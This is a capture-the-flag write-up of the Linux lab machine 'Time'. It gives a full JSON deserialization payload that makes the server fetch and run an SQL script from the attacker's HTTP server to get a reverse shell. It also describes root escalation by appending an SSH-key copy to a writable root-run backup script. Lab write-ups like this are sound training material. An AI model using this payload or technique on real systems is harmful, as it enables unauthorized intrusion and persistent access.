Summary
Time is a medium-rated Linux machine created by egotisticalSW & felamos. Initial foothold is discovered by accessing a JSON beautifier and validator running on port 80. Server Side Request Forgery can be abused to perform code execution and gain user access. Root privilege is obtained by modifying a back up script writable by the compromised user and is initiated by root.
Reconnaissance
Nmap discovered ports 80(http), and 22(ssh) open.
Checking the HTTP service reveals a JSON Beautifier and Validator page. Validator option shows that it is still in beta so there is a possibility that it is vulnerable.
Entering a character will show a long error ‘Validation failed’ message.
I looked up the error message on google and results showed me articles about jackson. After further research, learned that it is a popular java based library that maps and serializes java objects to JSON and vice versa.
During my research, I found a Github repository that demonstrates how to exploit jackson to inject SQL queries and perform code execution through Server Side Request Forgery.
Gaining User Access
The repository includes a ruby script that will automate the process but I did it manually to better understand how the exploitation works. I created a file similar to ‘inject.sql’ on the repository which contains a reverse shell payload. This SQL statement will create a SHELLEXEC alias and will call it at the end to execute our reverse shell.
I used python3 HTTP server to host the inject.sql file and set up a listener for the reverse shell connection.
Now that everything is set up, exploitation can be performed. Going back to the JSON Beautifier and Validator page, I entered the following input:
[“ch.qos.logback.core.db.DriverManagerConnectionSource”, {“url”:”jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM ‘http://10.10.15.135:8000/inject.sql'"}]
After processing the payload using the validate function, the server will download and execute the ‘inject.sql’ file from my HTTP server which will give me a reverse shell as the user, ‘pericles’. I am able to grab the user flag after the exploitation.
Since my uid is 1000, I copied my ssh public key to pericle’s SSH authorized_keys file in order to have a better shell functionality.
Privilege Escalation
After the initial access, I downloaded linpeas.sh on the target machine to look for more useful information that I can use to escalate my privileges.
I found some interesting files from the output and one of them is /usr/bin/backup.sh which is writable by me.
I also found some service configurations owned by root which may link to the bash script.
After checking the contents of the files, I found my path to gain root privileges.
Analysis of files
● timer_backup.timer — this defines a 10 second interval for the service timer_backup.service.
● timer_backup.service — this service will restart web_backup.service using systemctl.
● web_backup.service — this service will execute /usr/bin/timer_backup.sh Every 10 seconds. /usr/bin/timer_backup.sh is executed by web_backup.services which is owned by root. Since I have write privileges to /usr/bin/timer_backup.sh, all I did was append a command that will copy the /home/pericles/.ssh/authorized_keys which already contains my public key to /root/.ssh/authorized_keys.
After waiting at least 10 seconds, I was able to log in to SSH as root using my private key and grab the root flag.
That’s it for Time! Thank you for reading, stay safe, and have a good day!
